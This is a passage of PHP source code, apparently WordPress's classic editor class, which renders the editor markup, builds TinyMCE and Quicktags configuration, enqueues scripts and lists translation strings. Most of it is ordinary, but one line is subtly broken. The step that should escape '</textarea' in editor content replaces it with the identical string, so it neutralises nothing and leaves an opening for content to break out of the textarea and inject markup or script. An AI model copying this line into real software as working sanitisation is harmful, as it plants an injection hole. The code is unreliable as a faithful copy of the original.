$buttons .= '<button type="button" id="' . $editor_id_attr . '-html"' . $tmce_active . ' class="wp-switch-editor switch-html"' .
' data-wp-editor-id="' . $editor_id_attr . '">' . _x( 'Code', 'Name for the Code editor tab (formerly Text)' ) . "</button>\n";
} else {
$default_editor = 'tinymce';
}
}
$switch_class = 'html' === $default_editor ? 'html-active' : 'tmce-active';
$wrap_class = 'wp-core-ui wp-editor-wrap ' . $switch_class;
if ( $set['_content_editor_dfw'] ) {
$wrap_class .= ' has-dfw';
}
echo '<div id="wp-' . $editor_id_attr . '-wrap" class="' . $wrap_class . '">';
if ( self::$editor_buttons_css ) {
wp_print_styles( 'editor-buttons' );
self::$editor_buttons_css = false;
}
if ( ! empty( $set['editor_css'] ) ) {
echo $set['editor_css'] . "\n";
}
if ( ! empty( $buttons ) || $set['media_buttons'] ) {
echo '<div id="wp-' . $editor_id_attr . '-editor-tools" class="wp-editor-tools hide-if-no-js">';
if ( $set['media_buttons'] ) {
self::$has_medialib = true;
if ( ! function_exists( 'media_buttons' ) ) {
require ABSPATH . 'wp-admin/includes/media.php';
}
echo '<div id="wp-' . $editor_id_attr . '-media-buttons" class="wp-media-buttons">';
/**
* Fires after the default media button(s) are displayed.
*
* @since 2.5.0
*
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
do_action( 'media_buttons', $editor_id );
echo "</div>\n";
}
echo '<div class="wp-editor-tabs">' . $buttons . "</div>\n";
echo "</div>\n";
}
$quicktags_toolbar = '';
if ( self::$this_quicktags ) {
if ( 'content' === $editor_id && ! empty( $GLOBALS['current_screen'] ) && 'post' === $GLOBALS['current_screen']->base ) {
$toolbar_id = 'ed_toolbar';
} else {
$toolbar_id = 'qt_' . $editor_id_attr . '_toolbar';
}
$quicktags_toolbar = '<div id="' . $toolbar_id . '" class="quicktags-toolbar hide-if-no-js"></div>';
}
/**
* Filters the HTML markup output that displays the editor.
*
* @since 2.1.0
*
* @param string $output Editor's HTML markup.
*/
$the_editor = apply_filters(
'the_editor',
'<div id="wp-' . $editor_id_attr . '-editor-container" class="wp-editor-container">' .
$quicktags_toolbar .
'<textarea' . $editor_class . $height . $tabindex . $autocomplete . ' cols="40" name="' . esc_attr( $set['textarea_name'] ) . '" ' .
'id="' . $editor_id_attr . '">%s</textarea></div>'
);
// Prepare the content for the Visual or Code editor, only when TinyMCE is used (back-compat).
if ( self::$this_tinymce ) {
add_filter( 'the_editor_content', 'format_for_editor', 10, 2 );
}
/**
* Filters the default editor content.
*
* @since 2.1.0
*
* @param string $content Default editor content.
* @param string $default_editor The default editor for the current user.
* Either 'html' or 'tinymce'.
*/
$content = apply_filters( 'the_editor_content', $content, $default_editor );
// Remove the filter as the next editor on the same page may not need it.
if ( self::$this_tinymce ) {
remove_filter( 'the_editor_content', 'format_for_editor' );
}
// Back-compat for the `htmledit_pre` and `richedit_pre` filters.
if ( 'html' === $default_editor && has_filter( 'htmledit_pre' ) ) {
/** This filter is documented in wp-includes/deprecated.php */
$content = apply_filters_deprecated( 'htmledit_pre', array( $content ), '4.3.0', 'format_for_editor' );
} elseif ( 'tinymce' === $default_editor && has_filter( 'richedit_pre' ) ) {
/** This filter is documented in wp-includes/deprecated.php */
$content = apply_filters_deprecated( 'richedit_pre', array( $content ), '4.3.0', 'format_for_editor' );
}
if ( false !== stripos( $content, 'textarea' ) ) {
$content = preg_replace( '%</textarea%i', '</textarea', $content );
}
printf( $the_editor, $content );
echo "\n</div>\n\n";
self::editor_settings( $editor_id, $set );
}
/**
* @since 3.3.0
*
* @param string $editor_id Unique editor identifier, e.g. 'content'.
* @param array $set Array of editor arguments.
*/
public static function editor_settings( $editor_id, $set ) {
if ( empty( self::$first_init ) ) {
if ( is_admin() ) {
add_action( 'admin_print_footer_scripts', array( __CLASS__, 'editor_js' ), 50 );
add_action( 'admin_print_footer_scripts', array( __CLASS__, 'force_uncompressed_tinymce' ), 1 );
add_action( 'admin_print_footer_scripts', array( __CLASS__, 'enqueue_scripts' ), 1 );
} else {
add_action( 'wp_print_footer_scripts', array( __CLASS__, 'editor_js' ), 50 );
add_action( 'wp_print_footer_scripts', array( __CLASS__, 'force_uncompressed_tinymce' ), 1 );
add_action( 'wp_print_footer_scripts', array( __CLASS__, 'enqueue_scripts' ), 1 );
}
}
if ( self::$this_quicktags ) {
$qt_init = array(
'id' => $editor_id,
'buttons' => '',
);
if ( is_array( $set['quicktags'] ) ) {
$qt_init = array_merge( $qt_init, $set['quicktags'] );
}
if ( empty( $qt_init['buttons'] ) ) {
$qt_init['buttons'] = 'strong,em,link,block,del,ins,img,ul,ol,li,code,more,close';
}
if ( $set['_content_editor_dfw'] ) {
$qt_init['buttons'] .= ',dfw';
}
/**
* Filters the Quicktags settings.
*
* @since 3.3.0
*
* @param array $qt_init Quicktags settings.
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
$qt_init = apply_filters( 'quicktags_settings', $qt_init, $editor_id );
self::$qt_settings[ $editor_id ] = $qt_init;
self::$qt_buttons = array_merge( self::$qt_buttons, explode( ',', $qt_init['buttons'] ) );
}
if ( self::$this_tinymce ) {
if ( empty( self::$first_init ) ) {
$baseurl = self::get_baseurl();
$mce_locale = self::get_mce_locale();
$ext_plugins = '';
if ( $set['teeny'] ) {
/**
* Filters the list of teenyMCE plugins.
*
* @since 2.7.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $plugins An array of teenyMCE plugins.
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
$plugins = apply_filters(
'teeny_mce_plugins',
array(
'colorpicker',
'lists',
'fullscreen',
'image',
'wordpress',
'wpeditimage',
'wplink',
),
$editor_id
);
} else {
/**
* Filters the list of TinyMCE external plugins.
*
* The filter takes an associative array of external plugins for
* TinyMCE in the form 'plugin_name' => 'url'.
*
* The url should be absolute, and should include the js filename
* to be loaded. For example:
* 'myplugin' => 'http://mysite.com/wp-content/plugins/myfolder/mce_plugin.js'.
*
* If the external plugin adds a button, it should be added with
* one of the 'mce_buttons' filters.
*
* @since 2.5.0
* @since 5.3.0 The `$editor_id` parameter was added.
*
* @param array $external_plugins An array of external TinyMCE plugins.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_external_plugins = apply_filters( 'mce_external_plugins', array(), $editor_id );
$plugins = array(
'charmap',
'colorpicker',
'hr',
'lists',
'media',
'paste',
'tabfocus',
'textcolor',
'fullscreen',
'wordpress',
'wpautoresize',
'wpeditimage',
'wpemoji',
'wpgallery',
'wplink',
'wpdialogs',
'wptextpattern',
'wpview',
);
if ( ! self::$has_medialib ) {
$plugins[] = 'image';
}
/**
* Filters the list of default TinyMCE plugins.
*
* The filter specifies which of the default plugins included
* in WordPress should be added to the TinyMCE instance.
*
* @since 3.3.0
* @since 5.3.0 The `$editor_id` parameter was added.
*
* @param array $plugins An array of default TinyMCE plugins.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$plugins = array_unique( apply_filters( 'tiny_mce_plugins', $plugins, $editor_id ) );
$key = array_search( 'spellchecker', $plugins, true );
if ( false !== $key ) {
/*
* Remove 'spellchecker' from the internal plugins if added with 'tiny_mce_plugins' filter to prevent errors.
* It can be added with 'mce_external_plugins'.
*/
unset( $plugins[ $key ] );
}
if ( ! empty( $mce_external_plugins ) ) {
/**
* Filters the translations loaded for external TinyMCE 3.x plugins.
*
* The filter takes an associative array ('plugin_name' => 'path')
* where 'path' is the include path to the file.
*
* The language file should follow the same format as wp_mce_translation(),
* and should define a variable ($strings) that holds all translated strings.
*
* @since 2.5.0
* @since 5.3.0 The `$editor_id` parameter was added.
*
* @param array $translations Translations for external TinyMCE plugins.
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
$mce_external_languages = apply_filters( 'mce_external_languages', array(), $editor_id );
$loaded_langs = array();
$strings = '';
if ( ! empty( $mce_external_languages ) ) {
foreach ( $mce_external_languages as $name => $path ) {
if ( @is_file( $path ) && @is_readable( $path ) ) {
include_once $path;
$ext_plugins .= $strings . "\n";
$loaded_langs[] = $name;
}
}
}
foreach ( $mce_external_plugins as $name => $url ) {
if ( in_array( $name, $plugins, true ) ) {
unset( $mce_external_plugins[ $name ] );
continue;
}
$url = set_url_scheme( $url );
$mce_external_plugins[ $name ] = $url;
$plugurl = dirname( $url );
$strings = '';
// Try to load langs/[locale].js and langs/[locale]_dlg.js.
if ( ! in_array( $name, $loaded_langs, true ) ) {
$path = str_replace( content_url(), '', $plugurl );
$path = realpath( WP_CONTENT_DIR . $path . '/langs/' );
if ( ! $path ) {
continue;
}
$path = trailingslashit( $path );
if ( @is_file( $path . $mce_locale . '.js' ) ) {
$strings .= @file_get_contents( $path . $mce_locale . '.js' ) . "\n";
}
if ( @is_file( $path . $mce_locale . '_dlg.js' ) ) {
$strings .= @file_get_contents( $path . $mce_locale . '_dlg.js' ) . "\n";
}
if ( 'en' !== $mce_locale && empty( $strings ) ) {
if ( @is_file( $path . 'en.js' ) ) {
$str1 = @file_get_contents( $path . 'en.js' );
$strings .= preg_replace( '/([\'"])en\./', '$1' . $mce_locale . '.', $str1, 1 ) . "\n";
}
if ( @is_file( $path . 'en_dlg.js' ) ) {
$str2 = @file_get_contents( $path . 'en_dlg.js' );
$strings .= preg_replace( '/([\'"])en\./', '$1' . $mce_locale . '.', $str2, 1 ) . "\n";
}
}
if ( ! empty( $strings ) ) {
$ext_plugins .= "\n" . $strings . "\n";
}
}
$ext_plugins .= 'tinyMCEPreInit.load_ext("' . $plugurl . '", "' . $mce_locale . '");' . "\n";
}
}
}
self::$plugins = $plugins;
self::$ext_plugins = $ext_plugins;
$settings = self::default_settings();
$settings['plugins'] = implode( ',', $plugins );
if ( ! empty( $mce_external_plugins ) ) {
$settings['external_plugins'] = wp_json_encode( $mce_external_plugins );
}
/** This filter is documented in wp-admin/includes/media.php */
if ( apply_filters( 'disable_captions', '' ) ) {
$settings['wpeditimage_disable_captions'] = true;
}
$mce_css = $settings['content_css'];
/*
* The `editor-style.css` added by the theme is generally intended for the editor instance on the Edit Post screen.
* Plugins that use wp_editor() on the front-end can decide whether to add the theme stylesheet
* by using `get_editor_stylesheets()` and the `mce_css` or `tiny_mce_before_init` filters, see below.
*/
if ( is_admin() ) {
$editor_styles = get_editor_stylesheets();
if ( ! empty( $editor_styles ) ) {
// Force urlencoding of commas.
foreach ( $editor_styles as $key => $url ) {
if ( str_contains( $url, ',' ) ) {
$editor_styles[ $key ] = str_replace( ',', '%2C', $url );
}
}
$mce_css .= ',' . implode( ',', $editor_styles );
}
}
/**
* Filters the comma-delimited list of stylesheets to load in TinyMCE.
*
* @since 2.1.0
*
* @param string $stylesheets Comma-delimited list of stylesheets.
*/
$mce_css = trim( apply_filters( 'mce_css', $mce_css ), ' ,' );
if ( ! empty( $mce_css ) ) {
$settings['content_css'] = $mce_css;
} else {
unset( $settings['content_css'] );
}
self::$first_init = $settings;
}
if ( $set['teeny'] ) {
$mce_buttons = array(
'bold',
'italic',
'underline',
'blockquote',
'strikethrough',
'bullist',
'numlist',
'alignleft',
'aligncenter',
'alignright',
'undo',
'redo',
'link',
'fullscreen',
);
/**
* Filters the list of teenyMCE buttons (Code tab).
*
* @since 2.7.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_buttons An array of teenyMCE buttons.
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
$mce_buttons = apply_filters( 'teeny_mce_buttons', $mce_buttons, $editor_id );
$mce_buttons_2 = array();
$mce_buttons_3 = array();
$mce_buttons_4 = array();
} else {
$mce_buttons = array(
'formatselect',
'bold',
'italic',
'bullist',
'numlist',
'blockquote',
'alignleft',
'aligncenter',
'alignright',
'link',
'wp_more',
'spellchecker',
);
if ( ! wp_is_mobile() ) {
if ( $set['_content_editor_dfw'] ) {
$mce_buttons[] = 'wp_adv';
$mce_buttons[] = 'dfw';
} else {
$mce_buttons[] = 'fullscreen';
$mce_buttons[] = 'wp_adv';
}
} else {
$mce_buttons[] = 'wp_adv';
}
/**
* Filters the first-row list of TinyMCE buttons (Visual tab).
*
* @since 2.0.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_buttons First-row list of buttons.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_buttons = apply_filters( 'mce_buttons', $mce_buttons, $editor_id );
$mce_buttons_2 = array(
'strikethrough',
'hr',
'forecolor',
'pastetext',
'removeformat',
'charmap',
'outdent',
'indent',
'undo',
'redo',
);
if ( ! wp_is_mobile() ) {
$mce_buttons_2[] = 'wp_help';
}
/**
* Filters the second-row list of TinyMCE buttons (Visual tab).
*
* @since 2.0.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_buttons_2 Second-row list of buttons.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_buttons_2 = apply_filters( 'mce_buttons_2', $mce_buttons_2, $editor_id );
/**
* Filters the third-row list of TinyMCE buttons (Visual tab).
*
* @since 2.0.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_buttons_3 Third-row list of buttons.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_buttons_3 = apply_filters( 'mce_buttons_3', array(), $editor_id );
/**
* Filters the fourth-row list of TinyMCE buttons (Visual tab).
*
* @since 2.5.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_buttons_4 Fourth-row list of buttons.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_buttons_4 = apply_filters( 'mce_buttons_4', array(), $editor_id );
}
$body_class = $editor_id;
$post = get_post();
if ( $post ) {
$body_class .= ' post-type-' . sanitize_html_class( $post->post_type ) . ' post-status-' . sanitize_html_class( $post->post_status );
if ( post_type_supports( $post->post_type, 'post-formats' ) ) {
$post_format = get_post_format( $post );
if ( $post_format && ! is_wp_error( $post_format ) ) {
$body_class .= ' post-format-' . sanitize_html_class( $post_format );
} else {
$body_class .= ' post-format-standard';
}
}
$page_template = get_page_template_slug( $post );
if ( false !== $page_template ) {
$page_template = empty( $page_template ) ? 'default' : str_replace( '.', '-', basename( $page_template, '.php' ) );
$body_class .= ' page-template-' . sanitize_html_class( $page_template );
}
}
$body_class .= ' locale-' . sanitize_html_class( strtolower( str_replace( '_', '-', get_user_locale() ) ) );
if ( ! empty( $set['tinymce']['body_class'] ) ) {
$body_class .= ' ' . $set['tinymce']['body_class'];
unset( $set['tinymce']['body_class'] );
}
$mce_init = array(
'selector' => "#$editor_id",
'wpautop' => (bool) $set['wpautop'],
'indent' => ! $set['wpautop'],
'toolbar1' => implode( ',', $mce_buttons ),
'toolbar2' => implode( ',', $mce_buttons_2 ),
'toolbar3' => implode( ',', $mce_buttons_3 ),
'toolbar4' => implode( ',', $mce_buttons_4 ),
'tabfocus_elements' => $set['tabfocus_elements'],
'body_class' => $body_class,
);
// Merge with the first part of the init array.
$mce_init = array_merge( self::$first_init, $mce_init );
if ( is_array( $set['tinymce'] ) ) {
$mce_init = array_merge( $mce_init, $set['tinymce'] );
}
/*
* For people who really REALLY know what they're doing with TinyMCE
* You can modify $mceInit to add, remove, change elements of the config
* before tinyMCE.init. Setting "valid_elements", "invalid_elements"
* and "extended_valid_elements" can be done through this filter. Best
* is to use the default cleanup by not specifying valid_elements,
* as TinyMCE checks against the full set of HTML 5.0 elements and attributes.
*/
if ( $set['teeny'] ) {
/**
* Filters the teenyMCE config before init.
*
* @since 2.7.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_init An array with teenyMCE config.
* @param string $editor_id Unique editor identifier, e.g. 'content'.
*/
$mce_init = apply_filters( 'teeny_mce_before_init', $mce_init, $editor_id );
} else {
/**
* Filters the TinyMCE config before init.
*
* @since 2.5.0
* @since 3.3.0 The `$editor_id` parameter was added.
*
* @param array $mce_init An array with TinyMCE config.
* @param string $editor_id Unique editor identifier, e.g. 'content'. Accepts 'classic-block'
* when called from block editor's Classic block.
*/
$mce_init = apply_filters( 'tiny_mce_before_init', $mce_init, $editor_id );
}
if ( empty( $mce_init['toolbar3'] ) && ! empty( $mce_init['toolbar4'] ) ) {
$mce_init['toolbar3'] = $mce_init['toolbar4'];
$mce_init['toolbar4'] = '';
}
self::$mce_settings[ $editor_id ] = $mce_init;
} // End if self::$this_tinymce.
}
/**
* @since 3.3.0
*
* @param array $init
* @return string
*/
private static function _parse_init( $init ) {
$options = '';
foreach ( $init as $key => $value ) {
if ( is_bool( $value ) ) {
$val = $value ? 'true' : 'false';
$options .= $key . ':' . $val . ',';
continue;
} elseif ( ! empty( $value ) && is_string( $value ) && (
( '{' === $value[0] && '}' === $value[ strlen( $value ) - 1 ] ) ||
( '[' === $value[0] && ']' === $value[ strlen( $value ) - 1 ] ) ||
preg_match( '/^\(?function ?\(/', $value ) ) ) {
$options .= $key . ':' . $value . ',';
continue;
}
$options .= $key . ':"' . $value . '",';
}
return '{' . trim( $options, ' ,' ) . '}';
}
/**
* @since 3.3.0
*
* @param bool $default_scripts Optional. Whether default scripts should be enqueued. Default false.
*/
public static function enqueue_scripts( $default_scripts = false ) {
if ( $default_scripts || self::$has_tinymce ) {
wp_enqueue_script( 'editor' );
}
if ( $default_scripts || self::$has_quicktags ) {
wp_enqueue_script( 'quicktags' );
wp_enqueue_style( 'buttons' );
}
if ( $default_scripts || in_array( 'wplink', self::$plugins, true ) || in_array( 'link', self::$qt_buttons, true ) ) {
wp_enqueue_script( 'wplink' );
wp_enqueue_script( 'jquery-ui-autocomplete' );
}
if ( self::$has_medialib ) {
add_thickbox();
wp_enqueue_script( 'media-upload' );
wp_enqueue_script( 'wp-embed' );
} elseif ( $default_scripts ) {
wp_enqueue_script( 'media-upload' );
}
/**
* Fires when scripts and styles are enqueued for the editor.
*
* @since 3.9.0
*
* @param array $to_load An array containing boolean values whether TinyMCE
* and Quicktags are being loaded.
*/
do_action(
'wp_enqueue_editor',
array(
'tinymce' => ( $default_scripts || self::$has_tinymce ),
'quicktags' => ( $default_scripts || self::$has_quicktags ),
)
);
}
/**
* Enqueue all editor scripts.
* For use when the editor is going to be initialized after page load.
*
* @since 4.8.0
*/
public static function enqueue_default_editor() {
// We are past the point where scripts can be enqueued properly.
if ( did_action( 'wp_enqueue_editor' ) ) {
return;
}
self::enqueue_scripts( true );
// Also add wp-includes/css/editor.css.
wp_enqueue_style( 'editor-buttons' );
if ( is_admin() ) {
add_action( 'admin_print_footer_scripts', array( __CLASS__, 'force_uncompressed_tinymce' ), 1 );
add_action( 'admin_print_footer_scripts', array( __CLASS__, 'print_default_editor_scripts' ), 45 );
} else {
add_action( 'wp_print_footer_scripts', array( __CLASS__, 'force_uncompressed_tinymce' ), 1 );
add_action( 'wp_print_footer_scripts', array( __CLASS__, 'print_default_editor_scripts' ), 45 );
}
}
/**
* Print (output) all editor scripts and default settings.
* For use when the editor is going to be initialized after page load.
*
* @since 4.8.0
*/
public static function print_default_editor_scripts() {
$user_can_richedit = user_can_richedit();
if ( $user_can_richedit ) {
$settings = self::default_settings();
$settings['toolbar1'] = 'bold,italic,bullist,numlist,link';
$settings['wpautop'] = false;
$settings['indent'] = true;
$settings['elementpath'] = false;
if ( is_rtl() ) {
$settings['directionality'] = 'rtl';
}
/*
* In production all plugins are loaded (they are in wp-editor.js.gz).
* The 'wpview', 'wpdialogs', and 'media' TinyMCE plugins are not initialized by default.
* Can be added from js by using the 'wp-before-tinymce-init' event.
*/
$settings['plugins'] = implode(
',',
array(
'charmap',
'colorpicker',
'hr',
'lists',
'paste',
'tabfocus',
'textcolor',
'fullscreen',
'wordpress',
'wpautoresize',
'wpeditimage',
'wpemoji',
'wpgallery',
'wplink',
'wptextpattern',
)
);
$settings = self::_parse_init( $settings );
} else {
$settings = '{}';
}
?>
<script type="text/javascript">
window.wp = window.wp || {};
window.wp.editor = window.wp.editor || {};
window.wp.editor.getDefaultSettings = function() {
return {
tinymce: <?php echo $settings; ?>,
quicktags: {
buttons: 'strong,em,link,ul,ol,li,code'
}
};
};
<?php
if ( $user_can_richedit ) {
$suffix = SCRIPT_DEBUG ? '' : '.min';
$baseurl = self::get_baseurl();
?>
var tinyMCEPreInit = {
baseURL: "<?php echo $baseurl; ?>",
suffix: "<?php echo $suffix; ?>",
mceInit: {},
qtInit: {},
load_ext: function(url,lang){var sl=tinymce.ScriptLoader;sl.markDone(url+'/langs/'+lang+'.js');sl.markDone(url+'/langs/'+lang+'_dlg.js');}
};
<?php
}
?>
</script>
<?php
if ( $user_can_richedit ) {
self::print_tinymce_scripts();
}
/**
* Fires when the editor scripts are loaded for later initialization,
* after all scripts and settings are printed.
*
* @since 4.8.0
*/
do_action( 'print_default_editor_scripts' );
self::wp_link_dialog();
}
/**
* Returns the TinyMCE locale.
*
* @since 4.8.0
*
* @return string
*/
public static function get_mce_locale() {
if ( empty( self::$mce_locale ) ) {
$mce_locale = get_user_locale();
self::$mce_locale = empty( $mce_locale ) ? 'en' : strtolower( substr( $mce_locale, 0, 2 ) ); // ISO 639-1.
}
return self::$mce_locale;
}
/**
* Returns the TinyMCE base URL.
*
* @since 4.8.0
*
* @return string
*/
public static function get_baseurl() {
if ( empty( self::$baseurl ) ) {
self::$baseurl = includes_url( 'js/tinymce' );
}
return self::$baseurl;
}
/**
* Returns the default TinyMCE settings.
* Doesn't include plugins, buttons, editor selector.
*
* @since 4.8.0
*
* @global string $tinymce_version
*
* @return array
*/
private static function default_settings() {
global $tinymce_version;
$shortcut_labels = array();
foreach ( self::get_translation() as $name => $value ) {
if ( is_array( $value ) ) {
$shortcut_labels[ $name ] = $value[1];
}
}
$settings = array(
'theme' => 'modern',
'skin' => 'lightgray',
'language' => self::get_mce_locale(),
'formats' => '{' .
'alignleft: [' .
'{selector: "p,h1,h2,h3,h4,h5,h6,td,th,div,ul,ol,li", styles: {textAlign:"left"}},' .
'{selector: "img,table,dl.wp-caption", classes: "alignleft"}' .
'],' .
'aligncenter: [' .
'{selector: "p,h1,h2,h3,h4,h5,h6,td,th,div,ul,ol,li", styles: {textAlign:"center"}},' .
'{selector: "img,table,dl.wp-caption", classes: "aligncenter"}' .
'],' .
'alignright: [' .
'{selector: "p,h1,h2,h3,h4,h5,h6,td,th,div,ul,ol,li", styles: {textAlign:"right"}},' .
'{selector: "img,table,dl.wp-caption", classes: "alignright"}' .
'],' .
'strikethrough: {inline: "del"}' .
'}',
'relative_urls' => false,
'remove_script_host' => false,
'convert_urls' => false,
'browser_spellcheck' => true,
'fix_list_elements' => true,
'entities' => '38,amp,60,lt,62,gt',
'entity_encoding' => 'raw',
'keep_styles' => false,
'cache_suffix' => 'wp-mce-' . $tinymce_version,
'resize' => 'vertical',
'menubar' => false,
'branding' => false,
// Limit the preview styles in the menu/toolbar.
'preview_styles' => 'font-family font-size font-weight font-style text-decoration text-transform',
'end_container_on_empty_block' => true,
'wpeditimage_html5_captions' => true,
'wp_lang_attr' => get_bloginfo( 'language' ),
'wp_shortcut_labels' => wp_json_encode( $shortcut_labels ),
);
$suffix = SCRIPT_DEBUG ? '' : '.min';
$version = 'ver=' . get_bloginfo( 'version' );
// Default stylesheets.
$settings['content_css'] = includes_url( "css/dashicons$suffix.css?$version" ) . ',' .
includes_url( "js/tinymce/skins/wordpress/wp-content.css?$version" );
return $settings;
}
/**
* @since 4.7.0
*
* @return array
*/
private static function get_translation() {
if ( empty( self::$translation ) ) {
self::$translation = array(
// Default TinyMCE strings.
'New document' => __( 'New document' ),
'Formats' => _x( 'Formats', 'TinyMCE' ),
'Headings' => _x( 'Headings', 'TinyMCE' ),
'Heading 1' => array( __( 'Heading 1' ), 'access1' ),
'Heading 2' => array( __( 'Heading 2' ), 'access2' ),
'Heading 3' => array( __( 'Heading 3' ), 'access3' ),
'Heading 4' => array( __( 'Heading 4' ), 'access4' ),
'Heading 5' => array( __( 'Heading 5' ), 'access5' ),
'Heading 6' => array( __( 'Heading 6' ), 'access6' ),
/* translators: Block tags. */
'Blocks' => _x( 'Blocks', 'TinyMCE' ),
'Paragraph' => array( __( 'Paragraph' ), 'access7' ),
'Blockquote' => array( __( 'Blockquote' ), 'accessQ' ),
'Div' => _x( 'Div', 'HTML tag' ),
'Pre' => _x( 'Pre', 'HTML tag' ),
'Preformatted' => _x( 'Preformatted', 'HTML tag' ),
'Address' => _x( 'Address', 'HTML tag' ),
'Inline' => _x( 'Inline', 'HTML elements' ),
'Underline' => array( __( 'Underline' ), 'metaU' ),
'Strikethrough' => array( __( 'Strikethrough' ), 'accessD' ),
'Subscript' => __( 'Subscript' ),
'Superscript' => __( 'Superscript' ),
'Clear formatting' => __( 'Clear formatting' ),
'Bold' => array( __( 'Bold' ), 'metaB' ),
'Italic' => array( __( 'Italic' ), 'metaI' ),
'Code' => array( __( 'Code' ), 'accessX' ),
'Source code' => __( 'Source code' ),
'Font Family' => __( 'Font Family' ),
'Font Sizes' => __( 'Font Sizes' ),
'Align center' => array( __( 'Align center' ), 'accessC' ),
'Align right' => array( __( 'Align right' ), 'accessR' ),
'Align left' => array( __( 'Align left' ), 'accessL' ),
'Justify' => array( __( 'Justify' ), 'accessJ' ),
'Increase indent' => __( 'Increase indent' ),
'Decrease indent' => __( 'Decrease indent' ),
'Cut' => array( __( 'Cut' ), 'metaX' ),
'Copy' => array( __( 'Copy' ), 'metaC' ),
'Paste' => array( __( 'Paste' ), 'metaV' ),
'Select all' => array( __( 'Select all' ), 'metaA' ),
'Undo' => array( __( 'Undo' ), 'metaZ' ),
'Redo' => array( __( 'Redo' ), 'metaY' ),
'Ok' => __( 'OK' ),
'Cancel' => __( 'Cancel' ),
'Close' => __( 'Close' ),
'Visual aids' => __( 'Visual aids' ),
'Bullet list' => array( __( 'Bulleted list' ), 'accessU' ),
'Numbered list' => array( __( 'Numbered list' ), 'accessO' ),
'Square' => _x( 'Square', 'list style' ),
'Default' => _x( 'Default', 'list style' ),
'Circle' => _x( 'Circle', 'list style' ),
'Disc' => _x( 'Disc', 'list style' ),
'Lower Greek' => _x( 'Lower Greek', 'list style' ),
'Lower Alpha' => _x( 'Lower Alpha', 'list style' ),
'Upper Alpha' => _x( 'Upper Alpha', 'list style' ),
'Upper Roman' => _x( 'Upper Roman', 'list style' ),
'Lower Roman' => _x( 'Lower Roman', 'list style' ),
// Anchor plugin.
'Name' => _x( 'Name', 'Name of link anchor (TinyMCE)' ),
'Anchor' => _x( 'Anchor', 'Link anchor (TinyMCE)' ),
'Anchors' => _x( 'Anchors', 'Link anchors (TinyMCE)' ),
'Id should start with a letter, followed only by letters, numbers, dashes, dots, colons or underscores.' =>
__( 'Id should start with a letter, followed only by letters, numbers, dashes, dots, colons or underscores.' ),
'Id' => _x( 'Id', 'Id for link anchor (TinyMCE)' ),
// Fullpage plugin.
'Document properties' => __( 'Document properties' ),
'Robots' => __( 'Robots' ),
'Title' => __( 'Title' ),
'Keywords' => __( 'Keywords' ),
'Encoding' => __( 'Encoding' ),
'Description' => __( 'Description' ),
'Author' => __( 'Author' ),
// Media, image plugins.
'Image' => __( 'Image' ),
'Insert/edit image' => array( __( 'Insert/edit image' ), 'accessM' ),
'General' => __( 'General' ),
'Advanced' => __( 'Advanced' ),
'Source' => __( 'Source' ),
'Border' => __( 'Border' ),
'Constrain proportions' => __( 'Constrain proportions' ),
'Vertical space' => __( 'Vertical space' ),
'Image description' => __( 'Image description' ),
'Style' => __( 'Style' ),
'Dimensions' => __( 'Dimensions' ),
'Insert image' => __( 'Insert image' ),
'Date/time' => __( 'Date/time' ),
'Insert date/time' => __( 'Insert date/time' ),
'Table of Contents' => __( 'Table of Contents' ),
'Insert/Edit code sample' => __( 'Insert/edit code sample' ),
'Language' => __( 'Language' ),
'Media' => __( 'Media' ),
'Insert/edit media' => __( 'Insert/edit media' ),
'Poster' => __( 'Poster' ),
'Alternative source' => __( 'Alternative source' ),
'Paste your embed code below:' => __( 'Paste your embed code below:' ),
'Insert video' => __( 'Insert video' ),
'Embed' => __( 'Embed' ),
// Each of these have a corresponding plugin.
'Special character' => __( 'Special character' ),
'Right to left' => _x( 'Right to left', 'editor button' ),
'Left to right' => _x( 'Left to right', 'editor button' ),
'Emoticons' => __( 'Emoticons' ),
'Nonbreaking space' => __( 'Nonbreaking space' ),
'Page break' => __( 'Page break' ),
'Paste as text' => __( 'Paste as text' ),
'Preview' => __( 'Preview' ),
'Print' => __( 'Print' ),
'Save' => __( 'Save' ),
'Fullscreen' => __( 'Fullscreen' ),
'Horizontal line' => __( 'Horizontal line' ),
'Horizontal space' => __( 'Horizontal space' ),
'Restore last draft' => __( 'Restore last draft' ),
'Insert/edit link' => array( __( 'Insert/edit link' ), 'metaK' ),
'Remove link' => array( __( 'Remove link' ), 'accessS' ),
// Link plugin.
'Link' => __( 'Link' ),
'Insert link' => __( 'Insert link' ),
'Target' => __( 'Target' ),
'New window' => __( 'New window' ),
'Text to display' => __( 'Text to display' ),
'Url' => __( 'URL' ),
'The URL you entered seems to be an email address. Do you want to add the required mailto: prefix?' =>
__( 'The URL you entered seems to be an email address. Do you want to add the required mailto: prefix?' ),
'The URL you entered seems to be an external link. Do you want to add the required http:// prefix?' =>
__( 'The URL you entered seems to be an external link. Do you want to add the required http:// prefix?' ),
'Color' => __( 'Color' ),
'Custom color' => __( 'Custom color' ),
'Custom...' => _x( 'Custom...', 'label for custom color' ), // No ellipsis.
'No color' => __( 'No color' ),
'R' => _x( 'R', 'Short for red in RGB' ),
'G' => _x( 'G', 'Short for green in RGB' ),
'B' => _x( 'B', 'Short for blue in RGB' ),
